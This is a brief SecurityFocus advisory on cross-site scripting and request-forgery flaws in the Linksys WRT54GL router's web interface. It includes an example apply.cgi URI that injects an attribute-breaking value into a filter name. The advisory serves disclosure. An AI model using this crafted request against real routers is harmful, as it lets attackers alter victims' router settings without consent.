Cisco Linksys WRT54GL Router Multiple Security Vulnerabilities

An attacker can exploit these issues through a browser. To exploit cross-site scripting and cross-sire request-forgery issues, the attacker must entice an unsuspecting victim to follow a malicious URI.

The following example URI and an exploit code is available:

http://www.example.com/apply.cgi?submit_button=Filters&change_action=&submit_type=save&action=Apply&blocked_service=&filter_web=&filter_policy=&f_status=0&f_id=1&f_status1=disable&f_name=123">&f_status2=allow&day_all=1&time_all=1&allday=&blocked_service0=None&blocked_service1=None&host0=&host1=&host2=&host3=&url0=&url1=&url2=&url3=&url4=&url5=


 

Privacy Statement
Copyright 2010, SecurityFocus